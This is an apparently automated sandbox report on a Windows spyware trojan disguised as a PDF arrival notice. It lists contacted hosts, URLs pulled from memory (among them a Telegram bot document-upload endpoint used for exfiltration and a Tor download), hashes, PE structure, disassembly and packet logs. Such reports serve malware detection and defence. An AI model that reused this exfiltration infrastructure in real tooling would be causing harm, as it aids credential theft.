https://api.ipify.orgx&	0%	Avira URL Cloud	safe
http://ZLVZGU.com	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
elb097307-934924932.us-east-1.elb.amazonaws.com	174.129.214.20	true	false	high
webmail.hapkidocollege.com.au	103.9.171.52	true	true	unknown
api.ipify.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false		high
http://127.0.0.1:HTTP/1.1	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://api.ipify.org	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false		high
http://DynDns.comDynDNS	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dBHeYNWtul3f.net	MSBuild.exe, 00000003.00000002.479039341.000000000364E000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.479119119.0000000003668000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp	false		high
https://api.ipify.orgx&	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://ZLVZGU.com	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	Arrivalnotice2020pdf.exe, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.ipify.org/(	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false		high
https://api.ipify.orgGETMozilla/5.0	MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.9.171.52	unknown	Australia		45638	SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	true
174.129.214.20	unknown	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	323773
Start date:	27.11.2020
Start time:	14:24:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Arrivalnotice2020pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/0@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 87.8% (good quality ratio 82.4%) Quality average: 81.9% Quality standard deviation: 28.9%
HCA Information:	Successful, ratio: 92% Number of executed functions: 136 Number of non-executed functions: 34
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 104.42.151.234, 51.104.139.180, 23.210.248.85, 20.54.26.129, 8.241.122.254, 8.248.115.254, 8.253.95.249, 8.253.204.121, 67.26.137.254, 51.104.144.132, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:25:10	API Interceptor	746x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
174.129.214.20	Response_to_Motion_to_Vacate.doc	Get hash	malicious	Browse	api.ipify.org/
	vQau1zZe6u.exe	Get hash	malicious	Browse	api.ipify.org/
	{REQUEST FOR QUOTATION-local lot.1,2,3,4,6container..exe	Get hash	malicious	Browse	api.ipify.org/
	1119_673423.doc	Get hash	malicious	Browse	api.ipify.org/?format=xml
	35WF7sZ7IR.exe	Get hash	malicious	Browse	api.ipify.org/
	FACTURA.PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	Amended PO4800.exe	Get hash	malicious	Browse	api.ipify.org/
	ScanDocuments202011PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	Commercial Invoice73802,PDF.exe	Get hash	malicious	Browse	api.ipify.org/
	QUOTE.exe	Get hash	malicious	Browse	api.ipify.org/
	1102905893.doc	Get hash	malicious	Browse	api.ipify.org/
	1PmYoQcjTf.exe	Get hash	malicious	Browse	api.ipify.org/
	uHrRcraZmP.exe	Get hash	malicious	Browse	api.ipify.org/
	qIFdMHzqoE.exe	Get hash	malicious	Browse	api.ipify.org/
	QZ0gaAlf0Z.exe	Get hash	malicious	Browse	api.ipify.org/
	XTS QT-00572 REV_ASME NAMEPLATE MATERIAL Spec_scanned from a xerox printer001.exe	Get hash	malicious	Browse	api.ipify.org/
	New Order_40981.exe	Get hash	malicious	Browse	api.ipify.org/
	CHIBYKE08.exe	Get hash	malicious	Browse	api.ipify.org/
	vT444moDbD.exe	Get hash	malicious	Browse	api.ipify.org/
	PRODUCT SPECIFICATIONS.exe	Get hash	malicious	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
elb097307-934924932.us-east-1.elb.amazonaws.com	lxpo.exe	Get hash	malicious	Browse	54.204.14.42
	guy1.exe	Get hash	malicious	Browse	54.225.66.103
	guy2.exe	Get hash	malicious	Browse	54.243.161.145
	PO_0012009.xlsx	Get hash	malicious	Browse	23.21.252.4
	5C.exe	Get hash	malicious	Browse	54.225.169.28
	INV-6367-20_pdf.exe	Get hash	malicious	Browse	54.225.66.103
	#A06578987.xlsm	Get hash	malicious	Browse	54.204.14.42
	SecuriteInfo.com.Variant.Bulz.233365.3916.exe	Get hash	malicious	Browse	23.21.252.4
	https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.at	Get hash	malicious	Browse	54.225.169.28
	INVOICE.xlsx	Get hash	malicious	Browse	54.204.14.42
	PR24869408-V2.PDF.exe	Get hash	malicious	Browse	174.129.214.20
	Inquiry_pdf.exe	Get hash	malicious	Browse	23.21.42.25
	98650107.pdf.exe	Get hash	malicious	Browse	23.21.42.25
	#U00d6deme Onay#U0131 Makbuzu.exe	Get hash	malicious	Browse	174.129.214.20
	1125_56873981.doc	Get hash	malicious	Browse	54.243.161.145
	yFD40YF4upaZQYL.exe	Get hash	malicious	Browse	54.235.142.93
	ER mexico.exe	Get hash	malicious	Browse	54.235.83.248
	SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exe	Get hash	malicious	Browse	54.243.164.148
	SecuriteInfo.com.BackDoor.SpyBotNET.25.6057.exe	Get hash	malicious	Browse	50.19.252.36
	SecuriteInfo.com.BackDoor.SpyBotNET.25.7042.exe	Get hash	malicious	Browse	23.21.42.25

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU	qpFvMReV7S.exe	Get hash	malicious	Browse	103.42.108.46
	zisuzZpoW2.exe	Get hash	malicious	Browse	103.27.32.34
	HMNo45VSzL.xls	Get hash	malicious	Browse	112.140.180.17
	http://benhams.info/backups/invoice/	Get hash	malicious	Browse	223.130.27.213
	Account update for your HDFC Bank.exe	Get hash	malicious	Browse	223.130.27.10
	PDF FILE.exe	Get hash	malicious	Browse	223.130.27.10
	H4A2_423.EXE	Get hash	malicious	Browse	103.27.32.34
	http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQ	Get hash	malicious	Browse	223.130.27.125
	http://pinksheep.com/opencart/eRjcgIxS/&d=DwIFaQ	Get hash	malicious	Browse	223.130.27.125
	http://pinksheep.com/opencart/eRjcgIxS/	Get hash	malicious	Browse	223.130.27.125
	SC# 84979926 Cargo Delivery .PDF.exe	Get hash	malicious	Browse	223.130.27.10
	REP_IDT_070120_BOR_073020.doc	Get hash	malicious	Browse	103.9.171.8
	REP_IDT_070120_BOR_073020.doc	Get hash	malicious	Browse	103.9.171.8
	83163251.doc	Get hash	malicious	Browse	103.9.171.8
	753200739936864412.doc	Get hash	malicious	Browse	103.9.171.8
	83163251.doc	Get hash	malicious	Browse	103.9.171.8
	N_ME9604945610TR.doc	Get hash	malicious	Browse	103.9.171.8
	753200739936864412.doc	Get hash	malicious	Browse	103.9.171.8
	P_PB3183494383ZD.doc	Get hash	malicious	Browse	103.9.171.8
	K_NXE_070120_IBB_073020.doc	Get hash	malicious	Browse	103.9.171.8
AMAZON-AESUS	guy1.exe	Get hash	malicious	Browse	54.225.66.103
	guy2.exe	Get hash	malicious	Browse	54.243.161.145
	https://34.75.2o2.lol/XYWNc0aW9uPWwNsaWNrJngVybD1ovndHRwnczovL3NleY3wVyZWQtbG9naW4ubmV0nL3BhZ2VzLzQyY2FkNTJhZmU3YSZyZWNpcGllbnRfaWQ9NzM2OTg3ODg4JmNhbXBhaWduX3J1bl9pZD0zOTM3OTcz	Get hash	malicious	Browse	3.215.226.95
	https://bit.do/fLppr	Get hash	malicious	Browse	54.83.52.76
	PO_0012009.xlsx	Get hash	malicious	Browse	23.21.252.4
	https://webnavigator.co/?adprovider=AppFocus1&source=d-cp11560482685&group=cg60&device=c&keyword=&creative=477646941053&adposition=none&placement=www.123homeschool4me.com&target=segment_be_a_7802457135858218830&sl=&caid=11560482685&gw=1&test=%3a%2f%2fmail	Get hash	malicious	Browse	54.90.26.145
	https://m365.eu.vadesecure.com/safeproxy/v4?f=xQsVwKRZoQHMcJWN90zqnir6G6pZJkmZJBUJoNEfoN5w0NIk94-OeCH1NldcAqKsz75KalR9dIZlPCJr1Ux0xQ&i=dKwbScfh0hAXC0Inkkq0sM5FeXPK9I7Ny4D2nAPOiEibKJwP2etJDqX8WzAoEu0mklzE6wT-r8I8OtTRdIg8Sg&k=EPqM&r=_vxI1MPLJP9RjHYc6dmEH2aQYLnm7iSEcU9gx_WNg2_vrJo8MeAqNzNCqHX9DNrQ&s=dbc75c7ed54466f34eeae3fd3b1612b20fb815efc99933570f78acd79467623c&u=https%3A%2F%2Femail.utest.com%2Fls%2Fclick%3Fupn%3DlGjzeq3i4yih7CYyWDD2uGWEioaO303Ya1CTzgGY6ZFHmgV-2FF-2FEWXdAYvLiLIvET2r-2BfuQ5qIL56xFMZkA-2F-2BXKhuWb2hSemZwMxFmG0rDjjP9tlrcROzWmQSAh2kMQamb79I1cx4-2Fvjhww3n8oZQi-2FnOhlQdbGdNxKrX28q7P-2FPufa0AAvr-2FvNJcD-2FrxpMHjDG9dPJU0WEGqi12uVZQLCz-2BjYAJF5yCzK-2FjUezEn2d6sv-2BTETl96ejjfG9yQ2VbdWqGp_snpiKdUCY2bDrEnMsWMAnz6f3HkWPd0oUIj3WsKz0V4NahNEm-2BJ9rDW2-2Fib8wsclxoRuHsrv-2B0aoCVw0ftXwGZJTPgQ4k6DZXQjAqFeejOYe-2FRbaSc1Yf5Xj5PUa6lKqmFYNWSkevePONwyMaBGxV4NDGtgMbAc7jyOEWYDUniHPiY87Lpiw631423FED14OvXIfrL7S45QvDvK6-2Fc04r-2B65lMxyCebYSr-2FOr4bCpGQ-3D	Get hash	malicious	Browse	52.202.11.207
	https://webmail-re5rere.web.app/?emailtoken=test@test.com&domain=test.com	Get hash	malicious	Browse	34.236.142.3
	5C.exe	Get hash	malicious	Browse	54.225.169.28
	INV-6367-20_pdf.exe	Get hash	malicious	Browse	54.225.66.103
	#A06578987.xlsm	Get hash	malicious	Browse	54.204.14.42
	https://email.utest.com/ls/click?upn=kHi9kJ2VFJGMl00Uc0lXdd7WKRMGsOIU4g4ei1d-2FX5m1QA-2FrT8Vl5L3Fk3cMytK6G9se1iMMnmCZDn1xIdrYiQ1p-2FwcQpvha0Cl5oPF0v81y5hgAsim7OqaA63T8LZn1UUJIEgydRUHiWwDj8GYDCxqGnV0O0rI4O7I6kSKWwA2QN6GRUB5jtLYkPnKAtjOoUgEhfuSimn9pHS78TURJ3gh4c37fJ5SLcFsdSMlL5cSNM599TAmyU83RYL5vT6LiS59Z_K8t8bbLaByOBk98eoL7OiHjGcOStuW9cK4Z47GjL3LOg6J63-2FMkWRpNoPmcLIu18HCMEgODcyx-2FUvVhPVIvmHjzJiqJBCjoeBbWoJaKrxsvgnkh140XYi8oSb4fB3DPwhOq9ho1ZQ40V7Ij7E76nndroD8i7Zx6K9k23tLqOPU-2BI4uv4B0Gy5ZNEnpZd7wg2RXwXNiQ76annNuw-2BlzoA5-2FGihgJE5sZwqDaPnA1XR7c-3D	Get hash	malicious	Browse	52.202.11.207
	http://pma.climabitus.com/undercook.php	Get hash	malicious	Browse	23.20.225.204
	https://brechi5.wixsite.com/owa-webmail-updates	Get hash	malicious	Browse	52.2.188.208
	https://sugar-stirring-mockingbird.glitch.me/#comp@hansi.at	Get hash	malicious	Browse	52.205.236.122
	PR24869408-V2.PDF.exe	Get hash	malicious	Browse	174.129.214.20
	Inquiry_pdf.exe	Get hash	malicious	Browse	23.21.42.25
	98650107.pdf.exe	Get hash	malicious	Browse	23.21.42.25
	#U00d6deme Onay#U0131 Makbuzu.exe	Get hash	malicious	Browse	174.129.214.20
	http://searchlf.com	Get hash	malicious	Browse	34.196.190.195

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	SecuriteInfo.com.Mal.Generic-S.26042.exe	Get hash	malicious	Browse	174.129.214.20
	guy1.exe	Get hash	malicious	Browse	174.129.214.20
	guy2.exe	Get hash	malicious	Browse	174.129.214.20
	Exodus.exe	Get hash	malicious	Browse	174.129.214.20
	INV-6367-20_pdf.exe	Get hash	malicious	Browse	174.129.214.20
	#A06578987.xlsm	Get hash	malicious	Browse	174.129.214.20
	Order 51897.exe	Get hash	malicious	Browse	174.129.214.20
	PR24869408-V2.PDF.exe	Get hash	malicious	Browse	174.129.214.20
	98650107.pdf.exe	Get hash	malicious	Browse	174.129.214.20
	#U00d6deme Onay#U0131 Makbuzu.exe	Get hash	malicious	Browse	174.129.214.20
	Izezma64.dll	Get hash	malicious	Browse	174.129.214.20
	fuxenm32.dll	Get hash	malicious	Browse	174.129.214.20
	http://ancien-site-joomla.fr/build2.exe	Get hash	malicious	Browse	174.129.214.20
	yFD40YF4upaZQYL.exe	Get hash	malicious	Browse	174.129.214.20
	ER mexico.exe	Get hash	malicious	Browse	174.129.214.20
	SecuriteInfo.com.BackDoor.SpyBotNET.25.28272.exe	Get hash	malicious	Browse	174.129.214.20
	SecuriteInfo.com.BackDoor.SpyBotNET.25.6057.exe	Get hash	malicious	Browse	174.129.214.20
	SecuriteInfo.com.ArtemisTrojan.exe	Get hash	malicious	Browse	174.129.214.20
	SecuriteInfo.com.BackDoor.SpyBotNET.25.7042.exe	Get hash	malicious	Browse	174.129.214.20
	SecuriteInfo.com.BackDoor.SpyBotNET.25.30157.exe	Get hash	malicious	Browse	174.129.214.20

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.366904859461942
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Arrivalnotice2020pdf.exe
File size:	387584
MD5:	ed6f9a5ace6367f4e532dd4ec40762ac
SHA1:	5ed4fd1e8a4e7dbed31928c2b7dd2ca1043cb68e
SHA256:	df107977e92465958c206bf42e33ce394e8573da3c4035b69bfa0d0eaf367914
SHA512:	e9315f1a9d8f0f8ddb0c48f08c8262af5a49937e11f57341d34cdd1ae3c945aec156faf7818e4a30cb61e82168e422e8ef697d1b9f74e9e31787aeea6d14d143
SSDEEP:	6144:3H5RPXz5XmxrAtJPsorVF3obF8V33f35XHC5UelMPBevP/539VI7hv9u998Q:X5RfzJmxrkBsor7aF8V33h3lerf5s7h6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Km..Km..Km....>.Rm....<..m....=..m..Km...m....J.Xm..l. .Jm..l.:.Jm..Kmd.Jm..l.?.Jm..RichKm..........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40482f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FC0F239 [Fri Nov 27 12:34:01 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	be74bcf76a56fe7a35a0a7f280acf926

Entrypoint Preview

Instruction
call 00007FBDFC823183h
jmp 00007FBDFC81BA5Ch
call 00007FBDFC821DE7h
mov edx, eax
mov eax, dword ptr [edx+6Ch]
cmp eax, dword ptr [0041FC94h]
je 00007FBDFC81BBE2h
mov ecx, dword ptr [0041FD54h]
test dword ptr [edx+70h], ecx
jne 00007FBDFC81BBD7h
call 00007FBDFC821BCCh
mov eax, dword ptr [eax+04h]
ret
call 00007FBDFC821DC1h
mov edx, eax
mov eax, dword ptr [edx+6Ch]
cmp eax, dword ptr [0041FC94h]
je 00007FBDFC81BBE2h
mov ecx, dword ptr [0041FD54h]
test dword ptr [edx+70h], ecx
jne 00007FBDFC81BBD7h
call 00007FBDFC821BA6h
add eax, 000000A0h
ret
push ebp
mov ebp, esp
sub esp, 44h
mov eax, dword ptr [0041F9B8h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
mov dword ptr [ebp-2Ch], ebx
mov eax, dword ptr [esi+000000A8h]
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-44h], esi
mov dword ptr [ebp-40h], ebx
test eax, eax
je 00007FBDFC81BEE2h
push edi
lea edi, dword ptr [esi+04h]
cmp dword ptr [edi], ebx
jne 00007FBDFC81BBEEh
push edi
push 00001004h
push eax
lea eax, dword ptr [ebp-44h]
push ebx
push eax
call 00007FBDFC822648h
add esp, 14h
test eax, eax
jne 00007FBDFC81BE8Ah
push 00000004h
call 00007FBDFC81EFB5h
push 00000002h
push 00000180h
mov dword ptr [ebp-2Ch], eax

Rich Headers

Programming Language:

[RES] VS2012 build 50727
[LNK] VS2012 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d868	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5c000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5d000	0x1484	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c520	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x204	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x16129	0x16200	False	0.572199417373	data	6.66397370775	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x63ba	0x6400	False	0.363125	data	4.85831029815	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x3c884	0x39a00	False	0.978422417299	data	7.96878633663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x1e0	0x200	False	0.53125	data	4.71767883295	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5d000	0x8350	0x8400	False	0.127811316288	data	1.58596756783	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x5c060	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	HeapReAlloc, EnumSystemLocalesEx, IsValidLocaleName, LCMapStringEx, GetUserDefaultLocaleName, GetModuleHandleW, TerminateProcess, GetCurrentProcess, LoadLibraryExW, FlsSetValue, FlsGetValue, FlsAlloc, SetUnhandledExceptionFilter, UnhandledExceptionFilter, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, GetOEMCP, GetACP, IsValidCodePage, FreeEnvironmentStringsW, OutputDebugStringW, LoadLibraryW, SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, VirtualProtect, FlsFree, GetEnvironmentStringsW, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetStartupInfoW, InitOnceExecuteOnce, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, Sleep, GetLocaleInfoEx, MultiByteToWideChar, GetStringTypeW, GetLastError, HeapFree, GetCommandLineA, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, InitializeCriticalSectionAndSpinCount, IsProcessorFeaturePresent, IsDebuggerPresent, GetProcessHeap, SetLastError, GetCurrentThreadId, ExitProcess, GetModuleHandleExW, GetProcAddress, HeapSize, GetStdHandle, WriteFile, GetModuleFileNameW, GetFileType
MSWSOCK.dll	s_perror, rexec, rcmd, GetNameByTypeW, EnumProtocolsW, dn_expand
SETUPAPI.dll	SetupQueryInfFileInformationW, SetupGetInfFileListA, SetupQueueDeleteA
MPR.dll	MultinetGetConnectionPerformanceA, WNetConnectionDialog1A, WNetGetResourceParentA, MultinetGetConnectionPerformanceW, WNetGetUserW
WINMM.dll	timeEndPeriod, timeKillEvent, mmioFlush, midiStreamOut, joySetCapture, midiInStart
pdh.dll	PdhVbGetCounterPathElements, PdhRemoveCounter, PdhEnumObjectItemsW, PdhOpenQueryA, PdhVbIsGoodStatus, PdhGetLogFileSize
msi.dll
GDI32.dll	SetMagicColors, EnumFontFamiliesExW, CreateRectRgn, RemoveFontMemResourceEx, EudcUnloadLinkW, CreateCompatibleBitmap, CreateFontIndirectA, ScaleViewportExtEx, CreatePatternBrush, CreateICW
MAPI32.dll

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 27, 2020 14:24:55.405668974 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.425780058 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.443604946 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.443954945 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.444000006 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.444039106 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.444077969 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.444089890 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.444113970 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.444125891 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.444180965 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.455045938 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.455089092 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.455174923 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.455215931 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.455785036 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.455822945 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.455879927 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.455908060 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.457230091 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.457493067 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.457535028 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.457590103 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.457617998 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.459353924 CET	443	49697	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.459453106 CET	49697	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.501156092 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.501204967 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.501315117 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.501358032 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.537703991 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.576322079 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.576375961 CET	443	49702	92.122.145.220	192.168.2.3
Nov 27, 2020 14:24:55.576575994 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.576625109 CET	49702	443	192.168.2.3	92.122.145.220
Nov 27, 2020 14:24:55.577052116 CET	443	49702	92.122.145.220	192.168.2.3
